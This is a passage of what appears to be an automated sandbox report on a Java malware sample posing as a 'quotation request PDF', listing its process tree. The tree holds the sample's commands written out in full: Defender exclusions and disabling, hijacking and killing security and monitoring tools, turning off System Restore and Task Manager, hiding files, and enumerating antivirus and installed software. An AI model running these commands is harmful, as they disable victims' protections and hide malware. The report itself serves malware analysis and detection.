4008 4836 cmd.exe 336 PID 4836 wrote to memory of 4008 4836 cmd.exe 336 PID 4836 wrote to memory of 1136 4836 cmd.exe 337 PID 4836 wrote to memory of 1136 4836 cmd.exe 337 PID 584 wrote to memory of 4140 584 java.exe 338 PID 584 wrote to memory of 4140 584 java.exe 338 PID 584 wrote to memory of 1640 584 java.exe 340 PID 584 wrote to memory of 1640 584 java.exe 340 PID 4140 wrote to memory of 2192 4140 cmd.exe 342 PID 4140 wrote to memory of 2192 4140 cmd.exe 342 PID 4140 wrote to memory of 4016 4140 cmd.exe 343 PID 4140 wrote to memory of 4016 4140 cmd.exe 343 PID 584 wrote to memory of 4604 584 java.exe 344 PID 584 wrote to memory of 4604 584 java.exe 344 PID 4604 wrote to memory of 4376 4604 cmd.exe 346 PID 4604 wrote to memory of 4376 4604 cmd.exe 346 PID 4604 wrote to memory of 5108 4604 cmd.exe 347 PID 4604 wrote to memory of 5108 4604 cmd.exe 347 PID 584 wrote to memory of 4756 584 java.exe 348 PID 584 wrote to memory of 4756 584 java.exe 348 PID 4756 wrote to memory of 5076 4756 cmd.exe 350 PID 4756 wrote to memory of 5076 4756 cmd.exe 350 PID 4756 wrote to memory of 4816 4756 cmd.exe 351 PID 4756 wrote to memory of 4816 4756 cmd.exe 351 PID 584 wrote to memory of 4148 584 java.exe 352 PID 584 wrote to memory of 4148 584 java.exe 352 PID 4148 wrote to memory of 4904 4148 cmd.exe 354 PID 4148 wrote to memory of 4904 4148 cmd.exe 354 PID 4148 wrote to memory of 2336 4148 cmd.exe 355 PID 4148 wrote to memory of 2336 4148 cmd.exe 355 PID 584 wrote to memory of 4456 584 java.exe 356 PID 584 wrote to memory of 4456 584 java.exe 356 PID 4456 wrote to memory of 1668 4456 cmd.exe 358 PID 4456 wrote to memory of 1668 4456 cmd.exe 358 PID 4456 wrote to memory of 4288 4456 cmd.exe 359 PID 4456 wrote to memory of 4288 4456 cmd.exe 359 PID 584 wrote to memory of 4264 584 java.exe 360 PID 584 wrote to memory of 4264 584 java.exe 360 PID 4264 wrote to memory of 4156 4264 cmd.exe 362 PID 4264 wrote to memory of 4156 4264 cmd.exe 362 PID 4264 wrote to memory of 1528 4264 cmd.exe 363 PID 4264 wrote to memory of 1528 4264 cmd.exe 363 PID 584 wrote to memory of 1776 584 java.exe 364 PID 584 wrote to memory of 1776 584 java.exe 364 PID 1776 wrote to memory of 2628 1776 cmd.exe 366 PID 1776 wrote to memory of 2628 1776 cmd.exe 366 PID 1776 wrote to memory of 4832 1776 cmd.exe 367 PID 1776 wrote to memory of 4832 1776 cmd.exe 367 PID 584 wrote to memory of 5052 584 java.exe 368 PID 584 wrote to memory of 5052 584 java.exe 368 PID 5052 wrote to memory of 4816 5052 cmd.exe 370 PID 5052 wrote to memory of 4816 5052 cmd.exe 370 PID 5052 wrote to memory of 5020 5052 cmd.exe 371 PID 5052 wrote to memory of 5020 5052 cmd.exe 371 PID 584 wrote to memory of 1456 584 java.exe 372 PID 584 wrote to memory of 1456 584 java.exe 372 PID 1456 wrote to memory of 2788 1456 cmd.exe 374 PID 1456 wrote to memory of 2788 1456 cmd.exe 374 PID 1456 wrote to memory of 4288 1456 cmd.exe 375 PID 1456 wrote to memory of 4288 1456 cmd.exe 375 PID 584 wrote to memory of 3700 584 java.exe 376 PID 584 wrote to memory of 3700 584 java.exe 376 PID 584 wrote to memory of 5020 584 java.exe 380 PID 584 wrote to memory of 5020 584 java.exe 380 PID 584 wrote to memory of 3112 584 java.exe 383 PID 584 wrote to memory of 3112 584 java.exe 383 PID 584 wrote to memory of 1528 584 java.exe 385 PID 584 wrote to memory of 1528 584 java.exe 385 PID 584 wrote to memory of 5044 584 java.exe 387 PID 584 wrote to memory of 5044 584 java.exe 387 PID 584 wrote to memory of 1668 584 java.exe 389 PID 584 wrote to memory of 1668 584 java.exe 389 PID 584 wrote to memory of 1800 584 java.exe 391 PID 584 wrote to memory of 1800 584 java.exe 391 PID 584 wrote to memory of 2336 584 java.exe 393 PID 584 wrote to memory of 2336 584 java.exe 393 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 420 attrib.exe 3804 attrib.exe 3448 attrib.exe 1136 attrib.exe 1324 attrib.exe 1520 attrib.exe 1668 attrib.exe 3932 attrib.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2872
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:3932
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:420
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:3804
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:3448
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1136
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1324
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1520
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class2⤵
- Views/modifies file attributes
PID:1668
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:4028
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:4672
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:3680
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2512
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:3732
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1296
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1636
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:1516
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1664
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1772
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:1776
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1132
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2844
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4192
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:4244
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4316
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:4364
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4424
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:4508
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4560
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:4600
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4652
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:4712
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4776
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4816
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4964
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:5040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:5056
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4184
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2336
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4300
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4324
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1128
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:420
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵PID:2576
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵PID:4280
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1520
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1272
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2592
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4180
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:4272
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:4740
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:4784
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:4384
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:4832
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:4424
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:4764
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:2052
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:3084
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:4852
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4780
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:4796
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4956
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2364
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:3792
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4168
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:2340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:4212
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:4140
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1136
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1416
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1424
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:2092
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1160
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4436
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:3448
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:4240
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1128
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1776
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:4156
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:3876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:4996
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:3732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:4232
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:4620
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:4756
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:4876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:4908
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:4832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:4704
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵PID:4236
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵PID:5088
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3084
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1208
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:3040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3396
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:3324
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:4164
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:2868
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2512
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1416
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1612
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:4744
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4324
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1776
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵PID:4600
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵PID:3512
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:4120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:4620
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:4304
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4192
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:4756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:4888
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:2416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:4116
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵PID:3408
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵PID:4024
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4220
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵PID:2708
-
-
